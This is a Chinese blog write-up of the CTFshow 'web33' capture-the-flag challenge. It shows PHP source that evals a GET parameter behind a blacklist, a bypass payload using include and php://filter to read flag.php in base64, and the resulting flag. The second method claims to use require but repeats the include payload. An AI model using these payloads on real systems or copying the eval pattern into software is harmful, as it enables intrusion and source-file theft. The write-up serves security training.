ctfshow-命令执行-web33

最新推荐文章于 2024-06-06 15:57:16 发布
最新推荐文章于 2024-06-06 15:57:16 发布
阅读量450 收藏
点赞数
分类专栏: # CTFSHOW-命令执行 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43400535/article/details/121099737
版权

ctfshow-web33

ctfshow靶场命令执行内容

文章目录

题目描述:

在这里插入图片描述

原理:

同web29

审计

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 02:22:27
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){   
     //过滤了flag  system  php  cat  sort  shell   .   '  ` echo  ;  (  " 空格
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

方法:

思路:

绕过 flag system php cat sort shell . ’ ` echo ; ( " 空格的过滤

1.同web32

既然过滤了括号,使用include(文件包含)

payload:

http://4cf99b8f-672f-4bd9-97eb-8b2d97c05afd.challenge.ctf.show/?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

利用文件包含,将flag.php包含进来,这样执行变量c的时候,将执行带有包含文件的表达式,从而达到读取指定文件的目的。再使用过滤器,base64编码读取flag

filter:通过指定的通道来读取指定的文件
这里使用base64读取
不用base64读不到源文件

之后base64解码:

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:49:19
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:49:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

$flag="ctfshow{7ddd68fa-e1b2-40f2-aecf-c227755fe16c}";

2.同样使用文件包含,require

require 语句的使用方法与 include 语句类似,都是实现对外部文件的引用。在 PHP 文件执行之前,PHP解析器会用被引用文件的全部内容替换 require 语句,然后与 require 语句之外的其他语句组成新的 PHP 文件,最后再按新PHP 文件执行程序代码。
payload:

http://4cf99b8f-672f-4bd9-97eb-8b2d97c05afd.challenge.ctf.show/?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
同上以base64读取文件
base64解码得到flag

Flag:

ctfshow{7ddd68fa-e1b2-40f2-aecf-c227755fe16c}

ctf小菜鸡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow-web入门-命令执行(web32-36)
HkD01L的博客
06-25 1063
ctfshow,web入门,命令执行,web32,web33,web34,web35,web36
ctfshow-命令执行-web32
weixin_43400535的博客
10-28 831
ctfshow-web32 题目描述: 原理: 同web29 审计: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:56:31 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_r
ctfshow-web入门-命令执行web30-web36)
最新发布
Welcome To Myon'Blog !
06-06 1045
命令执行,需要严格的过滤。
Ctfshow web入门-web33
qq_45427131的博客
05-13 531
Ctfshow web入门-web33 WP 拿到url首先分析代码,发现preg_match函数的过滤条件又多了两个 /flag|system|php|cat|sort|shell|.| |’|`|echo|;|(|" 因为这题和web32一样,过滤了括号,所以有括号的函数肯定是不能用了,只能尝试文件包含,用include函数, payload: http://url/?c=eval($_POST[a])?> 配合POST提交a的数据 文件包含成功,用php伪协议查看flag 拿到base6
CTFshow 命令执行 web32 33 34 35 36
ChenD的学习笔记
11-08 954
CTFshow 命令执行 web32 web33 web34 web35 web36
CTFSHOW web入门——web32
m0_74093152的博客
04-23 483
因此可以构造payload:?可以将flag.php文件的内容转变成base64,然后将转换过的flag.php文件赋给a,再将a中的内容显示出来,最后将文件内容进行base64解码即可。过滤了flag、system、php、cat、sort、shell、echo以及一些符号。=是PHP的一个短的开放式标签,是echo()的快捷用法。
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow-web41~60-WP
02-21
目标是通过构建特定的payload来实现命令执行,并最终获取到flag。 #### 代码分析 首先,我们来看一下题目提供的PHP代码片段: ```php if(isset($_POST['c'])){ $c = $_POST['c']; if(!preg_match('/[0-9]|[a-z]...
CTFShow-周末大挑战parse-url篇Writeup
05-19
这表明服务端没有对用户输入进行充分的过滤或转义,允许了任意命令执行。 第二关中,URL编码的方式被用来绕过过滤。`%68%74%74%70%3a%2f%2f%64%61%74%61%3a%3a%2f%2f%74%65%73%74%2f%70%6c%61%69%6e%3b%62%61%73%65...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFshow 命令执行 web33
Kradress的博客
10-29 179
源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 02:22:27 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // error_reporting(0); if(isset($_GET['c'])
ctfshow-web32(命令执行)
m0_62094846的博客
01-21 336
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:56:31 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c'])...
Ctfshow web入门-web32
qq_45427131的博客
05-13 1642
Ctfshow web入门-web32 WP 拿到url,首先查看源码 过滤了以下字符串 flag|system|php|cat|sort|shell|.| |’|`|echo|;|( 过滤了空格可以用${IFS}和%0a 代替,分号可以用?>代替 但是过滤了括号之后就不能用带有括号的函数,php中include是可以不带括号的函数,和web31一样,这里需要用文件包含 所以构造的Payload是 payload:http://url/?c=include%0a$_POST[1]?>
CTFshow 命令执行 web32
Kradress的博客
10-29 355
源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:56:31 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c']))
ctfshow web入门 命令执行部分(32-36)
羽的博客
09-05 3314
以下目测均为非预期 32 这个题过滤了空格属实有点难受,php中不用括号的有echo include等 过滤了分号可以用?>绕过。 尝试了以下,发现 include"/etc/passwd"?>可以执行成功。再去想下没有过滤$,我们可以用$_POST[1]呀include"\$_POST[1]"?>然后post传参1=/etc/passwd执行成功。还有一个问题include包含php文件不会在页面显示出来,灵机一动,伪协议呀!完美 33 payload ?c=include$_POST
Bugku CTF web33(Web
ChaoYue_miku的博客
03-16 268
0、打开网页,下载附件 与其说是web题,更像是密码题,只不过用了PHP语言 <?php function encrypt($data,$key) { $key = md5('ISCC'); $x = 0; $len = strlen($data); $klen = strlen($key); for ($i=0; $i < $len; $i++) { if ($x == $klen) {
ctfshow---命令执行
fainpo的博客
03-20 1387
就是让标准输出重定向到/dev/null中(丢弃标准输出),然后错误输出由于重用了标准输出的描述符,所以错误输出也被定向到了/dev/null中,错误输出同样也被丢弃了。data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么作用。$((~$(( $((~$(())))+$((~$(())))+$((~$(()))) )))) 这个是2。
CTFshow-命令执行
qq_60905276的博客
07-04 743
CTFshow-命令执行
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值